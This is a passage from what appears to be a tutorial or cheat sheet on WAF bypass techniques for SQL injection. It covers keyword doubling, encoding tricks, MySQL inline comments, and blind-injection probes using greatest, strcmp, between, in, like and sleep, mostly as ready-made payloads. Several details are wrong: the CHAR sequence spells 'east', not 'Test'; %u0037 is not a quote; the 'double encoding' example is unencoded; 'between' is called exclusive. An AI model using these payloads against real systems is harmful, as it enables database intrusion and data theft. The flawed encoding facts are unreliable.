Case bypass: it is often used when the regular expression of the WAF is not case sensitive.

In some simple WAFs, the keyword `select` is replaced with an empty string by a single call to the `replace()` function. In this case the double-write keyword can be used to bypass: for example, `select` becomes `seleselect`, and after the WAF has processed it, it becomes `select` again, which meets the requirements for bypassing.

Encoding bypass: for example, URL encoding, ASCII, hex and Unicode encodings can be used to bypass.

Full URL encoding of keywords twice: `1+and+1=2`

ASCII encoding bypass: `Test` is equivalent to `CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)`

Hex bypass:

```sql
select * from users where username = test1
```

becomes

```sql
Select * from users where username = 0x7465737431
```

Bypass of some symbols by Unicode encoding: single quotation mark => `%u0037` `%u02b9`

Inline comments:

```sql
select * from cms_users where userid=1 union /*!select*/ 1,2,3
```

An inline comment puts statements that are unique to MySQL inside `/*! ... */`. In this way these statements will not be executed in other databases, but will be executed in MySQL. Generally, such problems are designed this way deliberately.

In SQL blind injection, size comparison is usually used to judge the ASCII code value in order to achieve the brute-force effect.

`greatest(n1, n2, n3, ...)` returns the maximum value among the n; `least(n1, n2, n3, ...)` returns the minimum value among the n:

```sql
select * from cms_users where userid=1 and greatest(ascii(substr(database(),1,1)),1)=99
```

`strcmp(str1, str2)`: if the strings are the same, it returns 0; if the first parameter is less than the second according to the current sort order, it returns -1; otherwise, it returns 1:

```sql
select * from cms_users where userid=1 and strcmp(ascii(substr(database(),0,1)),99)
```

`between a and b`: the range is between a and b (excluding b):

```sql
select * from cms_users where userid=1 and substr(database(),1,1) between 'a' and 'd'
```

The `in` keyword:

```sql
select * from cms_users where userid=1 and substr(database(),1,1) in ('c')
```

Generally, there are several methods to bypass space filtering; one is to replace spaces with `/**/`.

Another example uses the `^` operator:

```sql
Select * from cms_users where userid=1^sleep(5)
```

`like` without a wildcard can be used to replace `=`:

```sql
Select * from cms_users where username like "admin"
```

`like` with a wildcard, as normally used:

```sql
Select * from cms_users where username like "ad%"
```

`like` without a wildcard has the same effect as `=`, so it can be used to bypass.